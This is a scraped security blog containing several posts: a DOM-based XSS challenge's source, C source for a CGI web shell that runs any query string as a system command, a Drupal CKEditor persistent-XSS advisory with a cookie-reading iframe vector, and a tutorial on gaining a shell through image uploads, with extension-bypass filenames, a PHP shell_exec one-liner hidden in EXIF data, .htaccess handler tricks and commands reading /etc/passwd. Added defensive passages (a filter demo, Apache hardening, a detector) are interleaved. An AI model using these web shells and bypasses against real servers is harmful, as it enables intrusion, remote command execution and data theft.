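The filter in the challenge is a keyword deny-list, and the write-up above shows why that does not hold: the sink is innerHTML, so whatever survives decoding is parsed as markup, while indexOf only ever sees literal bytes. The following is an added example, not code from the post or from the challenge site. It re-implements the challenge's decode step and blacklist as plain functions (names such as decodeChallengeInput, blacklistValidate and safeRender are my own) and puts the defender's fix beside them: render the hash as text, which is textContent in a browser and is done here as HTML-escaping so it runs in Node without a DOM.

```javascript
// Added example, not from the original post or the challenge site. It re-implements
// the challenge's decode step and keyword blacklist as plain functions and puts the
// defender's fix beside them. All names below are my own.

// Mirrors what the challenge's simple_decode() does to location.hash before the
// blacklist runs: shift every code point down by one, then drop the last 6 chars.
function decodeChallengeInput(raw) {
  const body = raw.substr(0, raw.length - 6);
  let out = '';
  for (let i = 0; i < body.length; i++) {
    out += String.fromCharCode(body.charCodeAt(i) - 1);
  }
  return out;
}

// Inverse of the above, used here only to build test inputs: shift by +1 and append
// 6 filler characters. The filler ends in '!' because the page also checks that the
// raw hash's last character is '!'.
function encodeChallengeInput(html) {
  let out = '';
  for (let i = 0; i < html.length; i++) {
    out += String.fromCharCode(html.charCodeAt(i) + 1);
  }
  return out + '!!!!!!';
}

// The challenge's validate(): a deny-list of three substrings over the decoded text.
// Returns null on a hit, otherwise the decoded string, which the page assigns to
// innerHTML as-is.
const BLACKLIST = ['alert(', 'prompt(', 'confirm('];
function blacklistValidate(raw) {
  const data = decodeChallengeInput(raw);
  const hit = BLACKLIST.some((kw) => data.indexOf(kw) > -1);
  return hit ? null : data;
}

// Defender's fix: treat the hash as text, not markup. In a browser that is
// element.textContent = data; here the equivalent HTML-escaping is done by hand so
// the result can be inspected without a DOM.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ESCAPES[c]);
}
function safeRender(raw) {
  return escapeHtml(decodeChallengeInput(raw));
}

// Constructed inputs. The first spells "alert(" out and is caught; the second has the
// shape of the post's vector, where the deny-listed substring never appears literally.
const PLAIN_ALERT = encodeChallengeInput('<img src=a onerror=alert(1)>');
const ENCODED_CALL = encodeChallengeInput(
  '<img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>'
);

// Summarises the three facts a reviewer of this filter needs.
function demo() {
  return {
    literalBlocked: blacklistValidate(PLAIN_ALERT) === null,
    encodedPassesBlacklist: blacklistValidate(ENCODED_CALL) !== null,
    safeOutputHasNoTag: !/<img/.test(safeRender(ENCODED_CALL)),
  };
}

console.log(demo());
```

Run it with node; demo() returns three booleans. The lesson is not the particular vector but that a deny-list over decoded input cannot be made complete, so the fix belongs at the sink: untrusted data goes into textContent, never innerHTML.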
<br />
<br />
<b><span style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><span style="background-color: white;"><code>And here is the original source code in case the site ever goes down:</code></span></span></span></b><br />
<span style="background-color: white;"><code><span style="color: #7ac07c;"><br /></span></code></span>
<span style="background-color: white;"><code><span style="color: #7ac07c;"><br /></span></code></span>
<span style="background-color: #444444;"><code><span style="color: #7ac07c;"><br /></span></code></span>
<span style="background-color: #444444;"><code><span style="color: #7ac07c;"> </span></code></span><code><span style="background-color: #444444;"><span style="color: #7ac07c;"><!</span><span style="color: #66ccff;">DOCTYPE html</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">html</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">title</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">JavaScript Analysis </span><span style="color: #7ac07c;">and </span><span style="color: #66ccff;">DOM</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">based XSS Challenge</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">title</span><span style="color: #7ac07c;">><br /><br /> <</span><span style="color: #66ccff;">head</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">style type</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"text/css"</span><span style="color: #7ac07c;">><br /> </span><span style="color: #ffcccc;">#hello {<br /> </span><span style="color: #66ccff;">font</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">family</span><span style="color: #7ac07c;">:</span><span style="color: #66ccff;">monospace</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">font</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">size</span><span style="color: #7ac07c;">:</span><span style="color: #66ccff;">30px</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">color</span><span style="color: #7ac07c;">: </span><span style="color: #ffcccc;">#FFFFFF;<br /> </span><span style="color: #7ac07c;">}<br /> </span><span style="color: #ffcccc;">#one {<br /> </span><span style="color: #66ccff;">font</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">family</span><span style="color: 
#7ac07c;">:</span><span style="color: #66ccff;">monospace</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">font</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">: </span><span style="color: #66ccff;">italic</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">color</span><span style="color: #7ac07c;">: </span><span style="color: #ffcccc;">#FFFFFF;<br /> </span><span style="color: #7ac07c;">}<br /> </span><span style="color: #66ccff;">body </span><span style="color: #7ac07c;">{<br /> </span><span style="color: #66ccff;">background</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">color</span><span style="color: #7ac07c;">: </span><span style="color: #ffcccc;">#000000;<br /> </span><span style="color: #7ac07c;">}<br /> </</span><span style="color: #66ccff;">head</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">><br /><br /> <</span><span style="color: #66ccff;">body</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">center</span><span style="color: #7ac07c;">><</span><span style="color: #66ccff;">b</span><span style="color: #7ac07c;">><</span><span style="color: #66ccff;">p id</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'hello'</span><span style="color: #7ac07c;">> </span><span style="color: #66ccff;">DOM</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">based XSS Challenge with JS Analysis</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">p</span><span style="color: #7ac07c;">></</span><span style="color: #66ccff;">b</span><span style="color: #7ac07c;">><br /><br /> </</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> 
</</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">p id</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'one'</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">One does not simply finds a DOM based XSS without js analysis</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">p</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">img src</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'considered.png' </span><span style="color: #66ccff;">width</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'350px' </span><span style="color: #66ccff;">height</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'300px'</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">p id</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'one'</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">One does not simply finds a DOM based XSS without js analysis</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">p</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">center</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">><br /> function </span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> return </span><span style="color: #66ccff;">parseInt</span><span style="color: #7ac07c;">(</span><span 
style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">charCodeAt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">));<br /> }<br /><br /> function </span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> return </span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">fromCharCode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">);<br /> }<br /><br /> </span><span style="color: #ffcccc;">/*<br /><br /> function hmm()<br /> {<br /><br /> var append = '';<br /> for(i=0; i<=5;i++)<br /> {<br /> append += chr(Math.floor((Math.random()*58)+65));<br /> }<br /> return append;<br /> }<br /> function simple_encode(data)<br /> {<br /> hmm();<br /> var encoded = '';<br /> for(i=0; i<data.length;i++)<br /> {<br /> <br /> encoded +=(chr(ascii(data[i]) + 1));<br /> <br /> }<br /> encoded += hmm();<br /> return encoded;<br /> }<br /><br />For Hints Ask: @prakharprasad, @rafaybaloch<br />Submit your vector: http://goo.gl/VlzWR<br /><br />Special Thanks to Rafay Baloch, Maxone, Dhaval and Amol Naik<br /><br />*/<br /><br /> </span><span style="color: #7ac07c;">function </span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> var </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">''</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">data </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: 
#7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length </span><span style="color: #7ac07c;">- </span><span style="color: #66ccff;">6</span><span style="color: #7ac07c;">);<br /> for (</span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">< </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">++) {<br /> </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">+= (</span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">]) - </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">))<br /> }<br /> return </span><span style="color: #66ccff;">decoded</span><span style="color: #7ac07c;">;<br /> }<br /><br /><br /> function </span><span style="color: #66ccff;">validate</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> </span><span style="color: #66ccff;">data </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">);<br /> </span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">= (</span><span style="color: 
#66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'bmfsu)itSvMl'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1 </span><span style="color: #7ac07c;">|| </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'qspnqu)eUbfjz'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1 </span><span style="color: #7ac07c;">|| </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'dpogjsn)ptBfCe'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">);<br /> return (</span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">? 
</span><span style="color: #66ccff;">null </span><span style="color: #7ac07c;">: </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">);<br /> }<br /><br /> function </span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">)<br /><br /> {<br /> return </span><span style="color: #66ccff;">unescape</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">));<br /> }<br /><br /> if (</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">) {<br /><br /> </span><span style="color: #66ccff;">taint </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">validate</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">));<br /> </span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">);<br /><br /> if (</span><span style="color: #66ccff;">cond</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span 
style="color: #66ccff;">cond</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length </span><span style="color: #7ac07c;">- </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">) == </span><span style="color: #ff99ff;">'!'</span><span style="color: #7ac07c;">) {<br /><br /> </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'hello'</span><span style="color: #7ac07c;">).</span><span style="color: #66ccff;">innerHTML </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">taint</span><span style="color: #7ac07c;">;<br /><br /> }<br /> } else {<br /> </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'hello'</span><span style="color: #7ac07c;">).</span><span style="color: #66ccff;">innerHTML </span><span style="color: #7ac07c;">+= </span><span style="color: #ff99ff;">'<br> Try to find a valid XSS vector, after reviewing the code :)'<br /> </span><span style="color: #7ac07c;">}<br /> </span><span style="color: #66ccff;"></script></span> </body><br /><br /></html> </span></code><br />
<br />
<br />
CGI-C Shell - PHP disabled functions/Safe Mode Bypass Shell source [Windows/Linux] (published 2013-05-18, updated 2014-06-09)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ONG0Ns1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/ONG0Ns1.jpg" height="218" width="640" /></a></div>
<br />
When PHP's safe mode is on, it can be a pain to do what you want on the system. Being able to execute CGI solves this problem, and here is my implementation of a shell (safe mode bypass) in C for Windows and Linux.<br />
<br />
<a name='more'></a><br />
// (If you find this useful, why not check out an advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/s0FTuyY.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/s0FTuyY.jpg" height="366" width="640" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/V5NU7fS.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/V5NU7fS.jpg" height="218" width="640" /></a></div>
<br />
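The defender's side of the same trick, as an added example that is not part of the post: the shell only works because an uploaded .htaccess is allowed to switch on ExecCGI and register a cgi-script handler (the two directives quoted in the comments at the top of the code below). Safe mode and disable_functions constrain only the PHP interpreter, so a process spawned by a different handler sits outside them and the control has to live in the web server. This Apache vhost fragment closes that door for a directory that holds user uploads; the directory path is a placeholder.

```apacheconf
# Added hardening example, not from the post; the path is a placeholder.
<Directory "/var/www/example/uploads">
    # Ignore .htaccess here, so an uploaded one cannot add "Options +ExecCGI"
    # or "AddHandler cgi-script cgi". (AllowOverride Options and FileInfo are
    # the two overrides those directives would otherwise need.)
    AllowOverride None

    # No CGI, no server-side includes, no directory listings in the upload tree.
    Options -ExecCGI -Includes -Indexes

    # Hand every file here to the static-file handler, so a .cgi (or .php)
    # that does get uploaded is served as bytes, never executed.
    SetHandler default-handler
</Directory>
```

Apply it in the server or vhost config, not in an .htaccess file, since the point is that .htaccess in the upload tree is no longer consulted; then confirm with a test upload that a .cgi in that directory comes back as a download rather than running.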
<h4>
<u><b>The code:</b></u></h4>
<span style="background-color: black;"><br /></span>
<span style="background-color: black;"><br /></span>
<pre class="default prettyprint prettyprinted"><code>#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>

//CGI-C Shell - Safe mode bypass ~ r0ng ~ hackers2devnull.blogspot.co.uk
//Upload a .htaccess file with:
// Options +ExecCGI
// AddHandler cgi-script cgi
//Then usage is target.com/shell.cgi?[command]
//Compatible with Windows and linux

int main( void )
{
 char *env = getenv("QUERY_STRING");
 char pStream[128];
 FILE *pPipe;

 urlStrip(env);
 printf("Content-type: text/html\n\n\n");

 #if defined (WIN32) || defined (_WIN32) || defined (__WIN32__) || defined (__NT__) || defined (WIN64) || defined (_WIN64) || defined (__WIN64__)
 pPipe = _popen( env, "r" );
 #else
 pPipe = popen( env, "r" );
 #endif

 while( !feof( pPipe ) )
 {
  if( fgets( pStream, 128, pPipe ) != NULL )
   printf( "<pre>%s", pStream );
 }
}

int urlStrip(char *str)
{
 unsigned int i;
 char url[BUFSIZ];
 char *ptr = url;
 memset(url, 0, sizeof(url));

 for (i=0; i < strlen(str); i++)
 {
  if (str[i] != '%')
  {
   *ptr++ = str[i];
   continue;
  }

  if (!isdigit(str[i+1]) || !isdigit(str[i+2]))
  {
   *ptr++ = str[i];
   continue;
  }

  *ptr++ = ((str[i+1] - '0') << 4) | (str[i+2] - '0');
  i += 2;
 }
 *ptr = '\0';
 strcpy(str, url);
 return 0;
}</code></pre>
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-25566361512009932662013-05-15T04:17:00.000-07:002015-06-13T16:44:46.320-07:00Persistent XSS in wysiwyg module CKEditor below 4.1 - drupal 6.x 7.x<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ZkJPIpK.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/ZkJPIpK.jpg" height="430" width="640" /></a></div>
<br />
This persistent XSS vulnerability requires a little bit of social engineering to work; see the report below:<br />
<br />
<a name='more'></a><br />
<br />
<br />
# Exploit Title: Persistent XSS in wysiwyg module CKEditor <4.1 Drupal 6.x & 7.x<br />
# Date: 15/05/2013<br />
# Exploit Author: r0ng<br />
# Vendor Homepage: http://www.websitesecurityscan.net, http://www.hackers2devnull.blogspot.co.uk<br />
# Software Links: http://ckeditor.com/release/CKEditor-4.0.3, http://drupal.org/download<br />
# Version: CKEditor <4.1, wysiwyg (all versions), Drupal 6.x and 7.x<br />
# Tested on: Firefox 21, IE 10, Chrome (v.26 now blocks it, unsure when this change was implemented)<br />
# Sites affected: approximately 180,000 drupal sites use ckeditor (http://drupal.org/project/usage/ckeditor)<br />
<br />
# Configuration:<br />
# -Default installation of Drupal 6.x and 7.x<br />
# -Default input filters (filtered HTML, disable rich text)<br />
<br />
[+] Vulnerability:<br />
<br />
By posting the following vector into a comment or a content post, a hidden iframe executes unrestricted javascript when viewed in edit mode (document.cookie is accessible). The attack vector is concealed when viewing the post normally and can be exploited by persuading the admin to edit a user's post or by them following a direct link, e.g.: http://website/node/4/edit.<br />
<br />
<br />
[+] Vector - hidden iframe with URL encoded script tags<br />
<br />
<iframe src="data:text/html; charset=utf-8,%3cscript%3ealert(document.cookie);%3c/script%3e" width="1" height="1" frameborder="0"></iframe><br />
<br />
<br />
[+] Disclosure and Fix:<br />
<br />
This was disclosed to Drupal on 20/01/13 and was fixed with the release of CKEditor 4.1 (21/03/13). (Although at the time of writing, backports of the fix for previous versions to ver 8 are still vulnerable...)<br />
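The vector above survives a filter that only looks for a literal script tag, because the script sits inside a percent-encoded data: URI that the browser decodes on its own. As an added example that is not part of the advisory, CKEditor or Drupal, this is a check a stored-HTML filter could run before saving a comment or node body; the sample inputs are constructed.

```python
"""Server-side check for the hidden data: URI iframe vector described above.

Added example, not part of the advisory, CKEditor or Drupal. A stored-HTML
filter would run this before saving a comment or node body and reject (or
log) anything it flags. Sample inputs are constructed.
"""
import base64
import binascii
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Attributes that load a URI; a data: URI in any of them embeds a whole
# document, so percent-encoded <script> inside it is decoded by the browser.
URI_ATTRS = {"src", "href", "data", "action", "formaction"}
SCRIPT_MARKERS = re.compile(r"<\s*script|javascript\s*:|\bon\w+\s*=", re.IGNORECASE)


def decode_data_uri(value: str) -> Optional[str]:
    """Return the decoded body of a data: URI, or None if value is not one."""
    v = value.strip()
    if not v.lower().startswith("data:"):
        return None
    header, _, body = v[5:].partition(",")
    if "base64" in header.lower():
        try:
            return base64.b64decode(body).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return body
    # Decode until stable so a double-encoded %253c also surfaces.
    prev = None
    while prev != body:
        prev, body = body, unquote(body)
    return body


class _VectorFinder(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:          # HTMLParser lower-cases names
            if value is None:
                continue
            if name in URI_ATTRS:
                decoded = decode_data_uri(value)
                if decoded is not None and SCRIPT_MARKERS.search(decoded):
                    self.findings.append((tag, name, "data: URI carries script"))
                elif value.strip().lower().startswith("javascript:"):
                    self.findings.append((tag, name, "javascript: URI"))
            elif name.startswith("on"):
                self.findings.append((tag, name, "inline event handler"))
        if tag == "iframe":
            # A 1x1 or 0x0 frame is invisible to the reader, as in the advisory.
            dims = [v for k, v in attrs if k in ("width", "height") and v is not None]
            if dims and all(v.strip() in ("0", "1") for v in dims):
                self.findings.append((tag, "size", "hidden 1x1 or 0x0 frame"))

    handle_startendtag = handle_starttag


def find_hidden_script_vectors(html: str) -> List[Tuple[str, str, str]]:
    """Return (tag, attribute, reason) for each suspicious construct in html."""
    parser = _VectorFinder()
    parser.feed(html)
    parser.close()
    return parser.findings
```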
<br />
<br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-80813840731263717442013-05-10T05:55:00.001-07:002013-10-23T15:33:24.933-07:00How to shell a server via image upload and bypass extension + real image verification<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQhM42oilED_7Xm-sAJMohdeL9iY5ExASaiXUp9rJPYQ_cow84KHSEcItzbuhqvizgbdcEPp1VbclPGEHKbZzbYz7PPdOKTkxtTArqaeVKfcbtK2DBmeNEQqlApBnGzA29o7HmF7zH65J/s1600/terminal_icon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQhM42oilED_7Xm-sAJMohdeL9iY5ExASaiXUp9rJPYQ_cow84KHSEcItzbuhqvizgbdcEPp1VbclPGEHKbZzbYz7PPdOKTkxtTArqaeVKfcbtK2DBmeNEQqlApBnGzA29o7HmF7zH65J/s320/terminal_icon.png" width="320" /></a></div>
During a website audit, upload forms and other interactive 'user-content' driven facilities are often found to be protected by client side and/or server side security checks. This tutorial presents the methods that can be used to circumvent these security checks. In this case we're specifically considering image uploads that allow JPG files in particular.<br />
<br />
<a name='more'></a><br />
<br />
Each security measure numbered below will be briefly discussed and paired with an appropriate bypass method; this tutorial aims to provide a complete'ish solution.<br />
<br />
<h4>
1. Client side file verification (with Javascript and/or HTML attributes)</h4>
<br />
<pre class="default prettyprint prettyprinted"><code><input name="fileToUpload" type="file" onchange="check_file()" ></code></pre>
<pre class="default prettyprint prettyprinted"><code>if($_FILES['userfile']['type'] != "image/jpg")</code></pre>
<br />
The bypass is trivial, simply rename your shell with an allowed extension/content type by editing the request header data with an intercepting proxy, I like <a href="http://portswigger.net/burp/" target="_blank">burp</a>, but FF <a href="https://addons.mozilla.org/En-us/firefox/addon/tamper-data/" target="_blank">Tamper Data</a> add-on is great too.<br />
<h4>
2. A white-list of file extensions is in place so that anything that isn't a picture is DENIED:</h4>
<br />
<pre class="default prettyprint prettyprinted"><code>$valid_file_extensions = array(".jpg", ".jpeg", ".gif", ".png");</code></pre>
<br />
Often there will then be some sort of string manipulation to determine the file name and extension of an uploaded file. The strength of this code will determine whether one of the following bypasses will work. Functions like 'strrchr' shown below may play a part in this process and may be passable given a little bit of imagination!<br />
<br />
<pre class="default prettyprint prettyprinted"><code>$file_extension = strrchr($_FILES["file"]["name"], ".");</code></pre>
<br />
Here is a list of bypasses:<br />
<br />
shell.jpg.php (satisfies a check for jpg only)<br />
shell.jpg.PhP (obfuscation)<br />
shell.php;.jpg (sometimes whatever is after ";" is ignored)<br />
shell.php%0delete0.jpg (the infamous NULL byte which comments out trailing text; remove the word delete so the zeros join together, blogspot strips this string!)<br />
<br />
shell.php.test (defaults to the first recognised extension, ignoring "test")<br />
shell.php.xxxjpg (still ends in jpg, but not a recognised extension, so it will default to php!)<br />
.phtml (a commonly used PHP-parsed extension that is often forgotten about!)<br />
.php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)<br />
<br />
<h4>
3. Perform further checks once uploaded to make sure it is a REAL image:</h4>
<pre class="default prettyprint prettyprinted"><code>$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);</code></pre>
The function getimagesize() effectively confirms whether the uploaded file is an image or not. At this point all the other methods will fail (there are other functions that can be used with a similar goal, such as checking image dimensions). The only foolproof solution is to upload a real image that actually passes these checks rather than trying to bypass them.<br />
<br />
We turn to the trusty JPG file as our example image. There is an amazing amount of information that can be stored in a JPG file alongside the actual image data. EXIF 'meta' data such as the camera model the image was taken on, image descriptions, and comments are editable with programs such as GIMP and even a hex editor. For the purposes of this tutorial I use <a href="http://exifpilot.com/" target="_blank">Exif Pilot</a>. (Edit: My good pal Hooded Robin wrote a nifty exif editor and shell builder in Ruby, check it out <a href="http://kaoticcreations.blogspot.co.uk/2013/10/ohno-evil-image-builder-meta-manipulator.html" target="_blank">here</a>).<br />
<br />
Create a small image (avatar size) in MSPaint (white background); then use Exif Pilot to open the file and edit the Exif data, inserting our PHP code into the 'comment' section. See the pic below, where I am using my generic 'tiny shell' code to allow me to pass shell commands to the server on the fly.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Iew2dsa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="http://i.imgur.com/Iew2dsa.jpg" width="640" /></a></div>
<br />
<b>code: </b><br />
<pre class="default prettyprint prettyprinted"><code><?if($_GET['r0ng']){echo"<pre>".shell_exec($_GET["r0ng"]);}?></code></pre>
<br />
Now we can upload the jpg file using an extension bypass shown earlier, and it will pass the real image check.<br />
<br />
To run commands on the server, usage would be:<br />
<br />
website.com/shell.jpg.php?r0ng=cat /etc/passwd<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/YyHTDmA.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://i.imgur.com/YyHTDmA.jpg" width="636" /></a></div>
<h4>
4. Found an extension that will upload but it's not valid PHP...</h4>
<span style="font-weight: normal;">Upload an .htaccess file which sets an arbitrary file extension to be processed as PHP. If there is already an .htaccess file in the image upload directory this should be automatically overwritten.</span><br />
<span style="font-weight: normal;">Create a .htaccess file and put the following code in it, then upload it (replace .mp3 with whatever extension passed).</span><br />
<pre class="default prettyprint prettyprinted"><code>AddType application/x-httpd-php .mp3</code></pre>
<span style="font-weight: normal;">Upload your shell as shell.mp3. Then access as: </span>website.com/shell.mp3?r0ng=cat /etc/passwd<br />
